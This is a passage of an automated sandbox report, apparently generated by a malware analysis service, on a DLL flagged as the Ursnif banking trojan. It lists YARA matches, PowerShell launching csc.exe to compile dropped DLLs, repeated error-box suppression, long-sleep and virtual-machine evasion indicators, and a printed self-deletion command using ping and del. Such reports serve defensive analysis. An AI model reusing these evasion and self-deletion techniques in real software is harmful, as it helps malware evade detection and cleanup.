                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F838A0 push ecx; ret 2_2_04F838A9
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DC4492 push ss; ret 34_2_00DC4493
                      Source: lokvQRcUe0.dllStatic PE information: section name: .erloc
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F6EC00 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,2_2_04F6EC00
                      Source: lokvQRcUe0.dllStatic PE information: real checksum: 0x79835 should be: 0x7114c
                      Source: b5khtopv.dll.28.drStatic PE information: real checksum: 0x0 should be: 0x671e
                      Source: kikzslfg.dll.30.drStatic PE information: real checksum: 0x0 should be: 0x41ac
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5khtopv.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kikzslfg.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5khtopv.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kikzslfg.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\b5khtopv.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\kikzslfg.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294681357.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294564948.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294395671.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294731571.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.338694096.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294789206.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339835630.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294648025.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294608365.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294468322.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.340707199.000000000533C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6380, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6564, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 2388, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.4d994a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4d994a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4a10000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.543a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54e6b48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54b94a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.543a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.454256752.00000000051BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339689659.000000000543A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.406864821.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.405146209.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.404521640.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339724690.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.452738390.0000000004D99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Self deletion via cmd delete
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lokvQRcUe0.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lokvQRcUe0.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1928Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                      Source: C:\Windows\System32\control.exe TID: 3396Thread sleep time: -1773297476s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\b5khtopv.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\kikzslfg.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6164Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3110Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F665C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_04F665C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F699BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_04F699BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F7BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_04F7BAD1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F6FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_04F6FD47
                      Source: control.exe, 00000022.00000002.1120355599.0000016545F88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:eEE|
                      Source: explorer.exe, 00000025.00000000.419693379.000000000814C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
